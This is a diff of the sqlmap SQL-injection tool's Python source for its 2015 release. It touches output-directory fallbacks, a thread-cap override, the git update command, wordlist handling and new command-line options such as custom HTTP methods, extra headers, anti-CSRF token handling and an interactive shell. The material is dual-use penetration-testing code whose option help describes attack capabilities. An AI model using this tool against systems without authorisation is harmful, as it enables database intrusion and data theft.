tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||||
|
except Exception, _:
|
||||||
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
|
errMsg += "that you have sufficient write permissions to "
|
||||||
|
errMsg += "create temporary files and/or directories"
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
warnMsg = "unable to create regular output directory "
|
warnMsg = "unable to create regular output directory "
|
||||||
warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, ex)
|
warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex))
|
||||||
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
paths.SQLMAP_OUTPUT_PATH = tempDir
|
paths.SQLMAP_OUTPUT_PATH = tempDir
|
||||||
|
|
||||||
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), getUnicode(conf.hostname))
|
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
|
||||||
|
|
||||||
if not os.path.isdir(conf.outputPath):
|
if not os.path.isdir(conf.outputPath):
|
||||||
try:
|
try:
|
||||||
os.makedirs(conf.outputPath, 0755)
|
os.makedirs(conf.outputPath, 0755)
|
||||||
except OSError, ex:
|
except (OSError, IOError), ex:
|
||||||
|
try:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||||
|
except Exception, _:
|
||||||
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
|
errMsg += "that you have sufficient write permissions to "
|
||||||
|
errMsg += "create temporary files and/or directories"
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
warnMsg = "unable to create output directory "
|
warnMsg = "unable to create output directory "
|
||||||
warnMsg += "'%s' (%s). " % (conf.outputPath, ex)
|
warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
|
||||||
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
conf.outputPath = tempDir
|
conf.outputPath = tempDir
|
||||||
|
@ -544,9 +636,9 @@ def _createTargetDirs():
|
||||||
f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
|
f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
|
||||||
f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
|
f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
|
||||||
if conf.data:
|
if conf.data:
|
||||||
f.write("\n\n%s" % conf.data)
|
f.write("\n\n%s" % getUnicode(conf.data))
|
||||||
except IOError, ex:
|
except IOError, ex:
|
||||||
if "denied" in str(ex):
|
if "denied" in getUnicode(ex):
|
||||||
errMsg = "you don't have enough permissions "
|
errMsg = "you don't have enough permissions "
|
||||||
else:
|
else:
|
||||||
errMsg = "something went wrong while trying "
|
errMsg = "something went wrong while trying "
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -285,7 +285,7 @@ def runCase(parse):
|
||||||
elif result is False: # this means no SQL injection has been detected - if None, ignore
|
elif result is False: # this means no SQL injection has been detected - if None, ignore
|
||||||
retVal = False
|
retVal = False
|
||||||
|
|
||||||
console = getUnicode(console, system=True)
|
console = getUnicode(console, encoding=sys.stdin.encoding)
|
||||||
|
|
||||||
if parse and retVal:
|
if parse and retVal:
|
||||||
with codecs.open(conf.dumper.getOutputFile(), "rb", UNICODE_ENCODING) as f:
|
with codecs.open(conf.dumper.getOutputFile(), "rb", UNICODE_ENCODING) as f:
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -106,20 +106,25 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
||||||
kb.threadContinue = True
|
kb.threadContinue = True
|
||||||
kb.threadException = False
|
kb.threadException = False
|
||||||
|
|
||||||
if threadChoice and numThreads == 1 and any(_ in kb.injection.data for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY, PAYLOAD.TECHNIQUE.UNION)):
|
if threadChoice and numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)):
|
||||||
while True:
|
while True:
|
||||||
message = "please enter number of threads? [Enter for %d (current)] " % numThreads
|
message = "please enter number of threads? [Enter for %d (current)] " % numThreads
|
||||||
choice = readInput(message, default=str(numThreads))
|
choice = readInput(message, default=str(numThreads))
|
||||||
if choice and choice.isdigit():
|
if choice:
|
||||||
if int(choice) > MAX_NUMBER_OF_THREADS:
|
skipThreadCheck = False
|
||||||
|
if choice.endswith('!'):
|
||||||
|
choice = choice[:-1]
|
||||||
|
skipThreadCheck = True
|
||||||
|
if choice.isdigit():
|
||||||
|
if int(choice) > MAX_NUMBER_OF_THREADS and not skipThreadCheck:
|
||||||
errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
|
errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
|
||||||
logger.critical(errMsg)
|
logger.critical(errMsg)
|
||||||
else:
|
else:
|
||||||
numThreads = int(choice)
|
conf.threads = numThreads = int(choice)
|
||||||
break
|
break
|
||||||
|
|
||||||
if numThreads == 1:
|
if numThreads == 1:
|
||||||
warnMsg = "running in a single-thread mode. This could take a while."
|
warnMsg = "running in a single-thread mode. This could take a while"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -41,7 +41,7 @@ def update():
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
|
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
|
||||||
process = execute("git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE)
|
process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE)
|
||||||
pollProcess(process, True)
|
pollProcess(process, True)
|
||||||
stdout, stderr = process.communicate()
|
stdout, stderr = process.communicate()
|
||||||
success = not process.returncode
|
success = not process.returncode
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -9,6 +9,7 @@ import os
|
||||||
import zipfile
|
import zipfile
|
||||||
|
|
||||||
from lib.core.exception import SqlmapDataException
|
from lib.core.exception import SqlmapDataException
|
||||||
|
from lib.core.exception import SqlmapInstallationException
|
||||||
from lib.core.settings import UNICODE_ENCODING
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
|
|
||||||
class Wordlist(object):
|
class Wordlist(object):
|
||||||
|
@ -21,6 +22,7 @@ class Wordlist(object):
|
||||||
self.fp = None
|
self.fp = None
|
||||||
self.index = 0
|
self.index = 0
|
||||||
self.counter = -1
|
self.counter = -1
|
||||||
|
self.current = None
|
||||||
self.iter = None
|
self.iter = None
|
||||||
self.custom = custom or []
|
self.custom = custom or []
|
||||||
self.proc_id = proc_id
|
self.proc_id = proc_id
|
||||||
|
@ -37,15 +39,15 @@ class Wordlist(object):
|
||||||
elif self.index == len(self.filenames):
|
elif self.index == len(self.filenames):
|
||||||
self.iter = iter(self.custom)
|
self.iter = iter(self.custom)
|
||||||
else:
|
else:
|
||||||
current = self.filenames[self.index]
|
self.current = self.filenames[self.index]
|
||||||
if os.path.splitext(current)[1].lower() == ".zip":
|
if os.path.splitext(self.current)[1].lower() == ".zip":
|
||||||
_ = zipfile.ZipFile(current, 'r')
|
_ = zipfile.ZipFile(self.current, 'r')
|
||||||
if len(_.namelist()) == 0:
|
if len(_.namelist()) == 0:
|
||||||
errMsg = "no file(s) inside '%s'" % current
|
errMsg = "no file(s) inside '%s'" % self.current
|
||||||
raise SqlmapDataException(errMsg)
|
raise SqlmapDataException(errMsg)
|
||||||
self.fp = _.open(_.namelist()[0])
|
self.fp = _.open(_.namelist()[0])
|
||||||
else:
|
else:
|
||||||
self.fp = open(current, 'r')
|
self.fp = open(self.current, 'r')
|
||||||
self.iter = iter(self.fp)
|
self.iter = iter(self.fp)
|
||||||
|
|
||||||
self.index += 1
|
self.index += 1
|
||||||
|
@ -61,6 +63,11 @@ class Wordlist(object):
|
||||||
self.counter += 1
|
self.counter += 1
|
||||||
try:
|
try:
|
||||||
retVal = self.iter.next().rstrip()
|
retVal = self.iter.next().rstrip()
|
||||||
|
except zipfile.error, ex:
|
||||||
|
errMsg = "something seems to be wrong with "
|
||||||
|
errMsg += "the file '%s' ('%s'). Please make " % (self.current, ex)
|
||||||
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
|
raise SqlmapInstallationException, errMsg
|
||||||
except StopIteration:
|
except StopIteration:
|
||||||
self.adjust()
|
self.adjust()
|
||||||
retVal = self.iter.next().rstrip()
|
retVal = self.iter.next().rstrip()
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -9,7 +9,6 @@ import re
|
||||||
|
|
||||||
from xml.sax.handler import ContentHandler
|
from xml.sax.handler import ContentHandler
|
||||||
|
|
||||||
from lib.core.common import checkFile
|
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.common import parseXmlFile
|
from lib.core.common import parseXmlFile
|
||||||
from lib.core.common import sanitizeStr
|
from lib.core.common import sanitizeStr
|
||||||
|
@ -63,7 +62,7 @@ class MSSQLBannerHandler(ContentHandler):
|
||||||
def endElement(self, name):
|
def endElement(self, name):
|
||||||
if name == "signature":
|
if name == "signature":
|
||||||
for version in (self._version, self._versionAlt):
|
for version in (self._version, self._versionAlt):
|
||||||
if version and re.search(r" %s[\.\ ]+" % version, self._banner):
|
if version and re.search(r" %s[\.\ ]+" % re.escape(version), self._banner):
|
||||||
self._feedInfo("dbmsRelease", self._release)
|
self._feedInfo("dbmsRelease", self._release)
|
||||||
self._feedInfo("dbmsVersion", self._version)
|
self._feedInfo("dbmsVersion", self._version)
|
||||||
self._feedInfo("dbmsServicePack", self._servicePack)
|
self._feedInfo("dbmsServicePack", self._servicePack)
|
||||||
|
@ -104,8 +103,6 @@ def bannerParser(banner):
|
||||||
if not xmlfile:
|
if not xmlfile:
|
||||||
return
|
return
|
||||||
|
|
||||||
checkFile(xmlfile)
|
|
||||||
|
|
||||||
if Backend.isDbms(DBMS.MSSQL):
|
if Backend.isDbms(DBMS.MSSQL):
|
||||||
handler = MSSQLBannerHandler(banner, kb.bannerFp)
|
handler = MSSQLBannerHandler(banner, kb.bannerFp)
|
||||||
parseXmlFile(xmlfile, handler)
|
parseXmlFile(xmlfile, handler)
|
||||||
|
|
|
@ -1,11 +1,13 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
import re
|
||||||
|
import shlex
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
from optparse import OptionError
|
from optparse import OptionError
|
||||||
|
@ -17,13 +19,22 @@ from lib.core.common import checkDeprecatedOptions
|
||||||
from lib.core.common import checkSystemEncoding
|
from lib.core.common import checkSystemEncoding
|
||||||
from lib.core.common import expandMnemonics
|
from lib.core.common import expandMnemonics
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
|
from lib.core.data import cmdLineOptions
|
||||||
|
from lib.core.data import conf
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.defaults import defaults
|
from lib.core.defaults import defaults
|
||||||
|
from lib.core.enums import AUTOCOMPLETE_TYPE
|
||||||
|
from lib.core.exception import SqlmapShellQuitException
|
||||||
|
from lib.core.exception import SqlmapSyntaxException
|
||||||
from lib.core.settings import BASIC_HELP_ITEMS
|
from lib.core.settings import BASIC_HELP_ITEMS
|
||||||
from lib.core.settings import DUMMY_URL
|
from lib.core.settings import DUMMY_URL
|
||||||
from lib.core.settings import IS_WIN
|
from lib.core.settings import IS_WIN
|
||||||
from lib.core.settings import MAX_HELP_OPTION_LENGTH
|
from lib.core.settings import MAX_HELP_OPTION_LENGTH
|
||||||
from lib.core.settings import VERSION_STRING
|
from lib.core.settings import VERSION_STRING
|
||||||
|
from lib.core.shell import autoCompletion
|
||||||
|
from lib.core.shell import clearHistory
|
||||||
|
from lib.core.shell import loadHistory
|
||||||
|
from lib.core.shell import saveHistory
|
||||||
|
|
||||||
def cmdLineParser():
|
def cmdLineParser():
|
||||||
"""
|
"""
|
||||||
|
@ -32,7 +43,7 @@ def cmdLineParser():
|
||||||
|
|
||||||
checkSystemEncoding()
|
checkSystemEncoding()
|
||||||
|
|
||||||
_ = os.path.normpath(sys.argv[0])
|
_ = getUnicode(os.path.basename(sys.argv[0]), encoding=sys.getfilesystemencoding())
|
||||||
|
|
||||||
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
|
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
|
||||||
"\"%s\"" % _ if " " in _ else _)
|
"\"%s\"" % _ if " " in _ else _)
|
||||||
|
@ -81,6 +92,9 @@ def cmdLineParser():
|
||||||
request = OptionGroup(parser, "Request", "These options can be used "
|
request = OptionGroup(parser, "Request", "These options can be used "
|
||||||
"to specify how to connect to the target URL")
|
"to specify how to connect to the target URL")
|
||||||
|
|
||||||
|
request.add_option("--method", dest="method",
|
||||||
|
help="Force usage of given HTTP method (e.g. PUT)")
|
||||||
|
|
||||||
request.add_option("--data", dest="data",
|
request.add_option("--data", dest="data",
|
||||||
help="Data string to be sent through POST")
|
help="Data string to be sent through POST")
|
||||||
|
|
||||||
|
@ -113,6 +127,9 @@ def cmdLineParser():
|
||||||
request.add_option("--referer", dest="referer",
|
request.add_option("--referer", dest="referer",
|
||||||
help="HTTP Referer header value")
|
help="HTTP Referer header value")
|
||||||
|
|
||||||
|
request.add_option("-H", "--header", dest="header",
|
||||||
|
help="Extra header (e.g. \"X-Forwarded-For: 127.0.0.1\")")
|
||||||
|
|
||||||
request.add_option("--headers", dest="headers",
|
request.add_option("--headers", dest="headers",
|
||||||
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
|
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
|
||||||
|
|
||||||
|
@ -127,6 +144,9 @@ def cmdLineParser():
|
||||||
request.add_option("--auth-private", dest="authPrivate",
|
request.add_option("--auth-private", dest="authPrivate",
|
||||||
help="HTTP authentication PEM private key file")
|
help="HTTP authentication PEM private key file")
|
||||||
|
|
||||||
|
request.add_option("--ignore-401", dest="ignore401", action="store_true",
|
||||||
|
help="Ignore HTTP Error 401 (Unauthorized)")
|
||||||
|
|
||||||
request.add_option("--proxy", dest="proxy",
|
request.add_option("--proxy", dest="proxy",
|
||||||
help="Use a proxy to connect to the target URL")
|
help="Use a proxy to connect to the target URL")
|
||||||
|
|
||||||
|
@ -168,16 +188,28 @@ def cmdLineParser():
|
||||||
request.add_option("--randomize", dest="rParam",
|
request.add_option("--randomize", dest="rParam",
|
||||||
help="Randomly change value for given parameter(s)")
|
help="Randomly change value for given parameter(s)")
|
||||||
|
|
||||||
request.add_option("--safe-url", dest="safUrl",
|
request.add_option("--safe-url", dest="safeUrl",
|
||||||
help="URL address to visit frequently during testing")
|
help="URL address to visit frequently during testing")
|
||||||
|
|
||||||
request.add_option("--safe-freq", dest="saFreq", type="int",
|
request.add_option("--safe-post", dest="safePost",
|
||||||
|
help="POST data to send to a safe URL")
|
||||||
|
|
||||||
|
request.add_option("--safe-req", dest="safeReqFile",
|
||||||
|
help="Load safe HTTP request from a file")
|
||||||
|
|
||||||
|
request.add_option("--safe-freq", dest="safeFreq", type="int",
|
||||||
help="Test requests between two visits to a given safe URL")
|
help="Test requests between two visits to a given safe URL")
|
||||||
|
|
||||||
request.add_option("--skip-urlencode", dest="skipUrlEncode",
|
request.add_option("--skip-urlencode", dest="skipUrlEncode",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Skip URL encoding of payload data")
|
help="Skip URL encoding of payload data")
|
||||||
|
|
||||||
|
request.add_option("--csrf-token", dest="csrfToken",
|
||||||
|
help="Parameter used to hold anti-CSRF token")
|
||||||
|
|
||||||
|
request.add_option("--csrf-url", dest="csrfUrl",
|
||||||
|
help="URL address to visit to extract anti-CSRF token")
|
||||||
|
|
||||||
request.add_option("--force-ssl", dest="forceSSL",
|
request.add_option("--force-ssl", dest="forceSSL",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Force usage of SSL/HTTPS")
|
help="Force usage of SSL/HTTPS")
|
||||||
|
@ -223,6 +255,9 @@ def cmdLineParser():
|
||||||
injection.add_option("--skip", dest="skip",
|
injection.add_option("--skip", dest="skip",
|
||||||
help="Skip testing for given parameter(s)")
|
help="Skip testing for given parameter(s)")
|
||||||
|
|
||||||
|
injection.add_option("--skip-static", dest="skipStatic", action="store_true",
|
||||||
|
help="Skip testing parameters that not appear dynamic")
|
||||||
|
|
||||||
injection.add_option("--dbms", dest="dbms",
|
injection.add_option("--dbms", dest="dbms",
|
||||||
help="Force back-end DBMS to this value")
|
help="Force back-end DBMS to this value")
|
||||||
|
|
||||||
|
@ -271,7 +306,7 @@ def cmdLineParser():
|
||||||
"default %d)" % defaults.level)
|
"default %d)" % defaults.level)
|
||||||
|
|
||||||
detection.add_option("--risk", dest="risk", type="int",
|
detection.add_option("--risk", dest="risk", type="int",
|
||||||
help="Risk of tests to perform (0-3, "
|
help="Risk of tests to perform (1-3, "
|
||||||
"default %d)" % defaults.level)
|
"default %d)" % defaults.level)
|
||||||
|
|
||||||
detection.add_option("--string", dest="string",
|
detection.add_option("--string", dest="string",
|
||||||
|
@ -451,7 +486,7 @@ def cmdLineParser():
|
||||||
enumeration.add_option("--sql-file", dest="sqlFile",
|
enumeration.add_option("--sql-file", dest="sqlFile",
|
||||||
help="Execute SQL statements from given file(s)")
|
help="Execute SQL statements from given file(s)")
|
||||||
|
|
||||||
# User-defined function options
|
# Brute force options
|
||||||
brute = OptionGroup(parser, "Brute force", "These "
|
brute = OptionGroup(parser, "Brute force", "These "
|
||||||
"options can be used to run brute force "
|
"options can be used to run brute force "
|
||||||
"checks")
|
"checks")
|
||||||
|
@ -585,6 +620,9 @@ def cmdLineParser():
|
||||||
general.add_option("--crawl", dest="crawlDepth", type="int",
|
general.add_option("--crawl", dest="crawlDepth", type="int",
|
||||||
help="Crawl the website starting from the target URL")
|
help="Crawl the website starting from the target URL")
|
||||||
|
|
||||||
|
general.add_option("--crawl-exclude", dest="crawlExclude",
|
||||||
|
help="Regexp to exclude pages from crawling (e.g. \"logout\")")
|
||||||
|
|
||||||
general.add_option("--csv-del", dest="csvDel",
|
general.add_option("--csv-del", dest="csvDel",
|
||||||
help="Delimiting character used in CSV output "
|
help="Delimiting character used in CSV output "
|
||||||
"(default \"%s\")" % defaults.csvDel)
|
"(default \"%s\")" % defaults.csvDel)
|
||||||
|
@ -651,11 +689,7 @@ def cmdLineParser():
|
||||||
help="Set question answers (e.g. \"quit=N,follow=N\")")
|
help="Set question answers (e.g. \"quit=N,follow=N\")")
|
||||||
|
|
||||||
miscellaneous.add_option("--beep", dest="beep", action="store_true",
|
miscellaneous.add_option("--beep", dest="beep", action="store_true",
|
||||||
help="Make a beep sound when SQL injection is found")
|
help="Beep on question and/or when SQL injection is found")
|
||||||
|
|
||||||
miscellaneous.add_option("--check-waf", dest="checkWaf",
|
|
||||||
action="store_true",
|
|
||||||
help="Heuristically check for WAF/IPS/IDS protection")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--cleanup", dest="cleanup",
|
miscellaneous.add_option("--cleanup", dest="cleanup",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
|
@ -675,12 +709,16 @@ def cmdLineParser():
|
||||||
|
|
||||||
miscellaneous.add_option("--identify-waf", dest="identifyWaf",
|
miscellaneous.add_option("--identify-waf", dest="identifyWaf",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Make a through testing for a WAF/IPS/IDS protection")
|
help="Make a thorough testing for a WAF/IPS/IDS protection")
|
||||||
|
|
||||||
miscellaneous.add_option("--mobile", dest="mobile",
|
miscellaneous.add_option("--mobile", dest="mobile",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Imitate smartphone through HTTP User-Agent header")
|
help="Imitate smartphone through HTTP User-Agent header")
|
||||||
|
|
||||||
|
miscellaneous.add_option("--offline", dest="offline",
|
||||||
|
action="store_true",
|
||||||
|
help="Work in offline mode (only use session data)")
|
||||||
|
|
||||||
miscellaneous.add_option("--page-rank", dest="pageRank",
|
miscellaneous.add_option("--page-rank", dest="pageRank",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Display page rank (PR) for Google dork results")
|
help="Display page rank (PR) for Google dork results")
|
||||||
|
@ -691,7 +729,10 @@ def cmdLineParser():
|
||||||
|
|
||||||
miscellaneous.add_option("--smart", dest="smart",
|
miscellaneous.add_option("--smart", dest="smart",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Conduct through tests only if positive heuristic(s)")
|
help="Conduct thorough tests only if positive heuristic(s)")
|
||||||
|
|
||||||
|
miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
|
||||||
|
help="Prompt for an interactive sqlmap shell")
|
||||||
|
|
||||||
miscellaneous.add_option("--wizard", dest="wizard",
|
miscellaneous.add_option("--wizard", dest="wizard",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
|
@ -716,9 +757,6 @@ def cmdLineParser():
|
||||||
parser.add_option("--force-dns", dest="forceDns", action="store_true",
|
parser.add_option("--force-dns", dest="forceDns", action="store_true",
|
||||||
help=SUPPRESS_HELP)
|
help=SUPPRESS_HELP)
|
||||||
|
|
||||||
parser.add_option("--ignore-401", dest="ignore401", action="store_true",
|
|
||||||
help=SUPPRESS_HELP)
|
|
||||||
|
|
||||||
parser.add_option("--smoke-test", dest="smokeTest", action="store_true",
|
parser.add_option("--smoke-test", dest="smokeTest", action="store_true",
|
||||||
help=SUPPRESS_HELP)
|
help=SUPPRESS_HELP)
|
||||||
|
|
||||||
|
@ -765,22 +803,81 @@ def cmdLineParser():
|
||||||
option = parser.get_option("-h")
|
option = parser.get_option("-h")
|
||||||
option.help = option.help.capitalize().replace("this help", "basic help")
|
option.help = option.help.capitalize().replace("this help", "basic help")
|
||||||
|
|
||||||
args = []
|
argv = []
|
||||||
|
prompt = False
|
||||||
advancedHelp = True
|
advancedHelp = True
|
||||||
|
extraHeaders = []
|
||||||
|
|
||||||
for arg in sys.argv:
|
for arg in sys.argv:
|
||||||
args.append(getUnicode(arg, system=True))
|
argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
|
||||||
|
|
||||||
checkDeprecatedOptions(args)
|
checkDeprecatedOptions(argv)
|
||||||
|
|
||||||
|
prompt = "--sqlmap-shell" in argv
|
||||||
|
|
||||||
|
if prompt:
|
||||||
|
parser.usage = ""
|
||||||
|
cmdLineOptions.sqlmapShell = True
|
||||||
|
|
||||||
|
_ = ["x", "q", "exit", "quit", "clear"]
|
||||||
|
|
||||||
|
for option in parser.option_list:
|
||||||
|
_.extend(option._long_opts)
|
||||||
|
_.extend(option._short_opts)
|
||||||
|
|
||||||
|
for group in parser.option_groups:
|
||||||
|
for option in group.option_list:
|
||||||
|
_.extend(option._long_opts)
|
||||||
|
_.extend(option._short_opts)
|
||||||
|
|
||||||
|
autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=_)
|
||||||
|
|
||||||
|
while True:
|
||||||
|
command = None
|
||||||
|
|
||||||
|
try:
|
||||||
|
command = raw_input("sqlmap-shell> ").strip()
|
||||||
|
command = getUnicode(command, encoding=sys.stdin.encoding)
|
||||||
|
except (KeyboardInterrupt, EOFError):
|
||||||
|
print
|
||||||
|
raise SqlmapShellQuitException
|
||||||
|
|
||||||
|
if not command:
|
||||||
|
continue
|
||||||
|
elif command.lower() == "clear":
|
||||||
|
clearHistory()
|
||||||
|
print "[i] history cleared"
|
||||||
|
saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
|
||||||
|
elif command.lower() in ("x", "q", "exit", "quit"):
|
||||||
|
raise SqlmapShellQuitException
|
||||||
|
elif command[0] != '-':
|
||||||
|
print "[!] invalid option(s) provided"
|
||||||
|
print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'"
|
||||||
|
else:
|
||||||
|
saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
|
||||||
|
loadHistory(AUTOCOMPLETE_TYPE.SQLMAP)
|
||||||
|
break
|
||||||
|
|
||||||
|
try:
|
||||||
|
for arg in shlex.split(command):
|
||||||
|
argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
|
||||||
|
except ValueError, ex:
|
||||||
|
raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message
|
||||||
|
|
||||||
# Hide non-basic options in basic help case
|
# Hide non-basic options in basic help case
|
||||||
for i in xrange(len(sys.argv)):
|
for i in xrange(len(argv)):
|
||||||
if sys.argv[i] == '-hh':
|
if argv[i] == "-hh":
|
||||||
sys.argv[i] = '-h'
|
argv[i] = "-h"
|
||||||
elif sys.argv[i] == '--version':
|
elif argv[i] == "-H":
|
||||||
print VERSION_STRING
|
if i + 1 < len(argv):
|
||||||
|
extraHeaders.append(argv[i + 1])
|
||||||
|
elif re.match(r"\A\d+!\Z", argv[i]) and argv[max(0, i - 1)] == "--threads" or re.match(r"\A--threads.+\d+!\Z", argv[i]):
|
||||||
|
argv[i] = argv[i][:-1]
|
||||||
|
conf.skipThreadCheck = True
|
||||||
|
elif argv[i] == "--version":
|
||||||
|
print VERSION_STRING.split('/')[-1]
|
||||||
raise SystemExit
|
raise SystemExit
|
||||||
elif sys.argv[i] == '-h':
|
elif argv[i] == "-h":
|
||||||
advancedHelp = False
|
advancedHelp = False
|
||||||
for group in parser.option_groups[:]:
|
for group in parser.option_groups[:]:
|
||||||
found = False
|
found = False
|
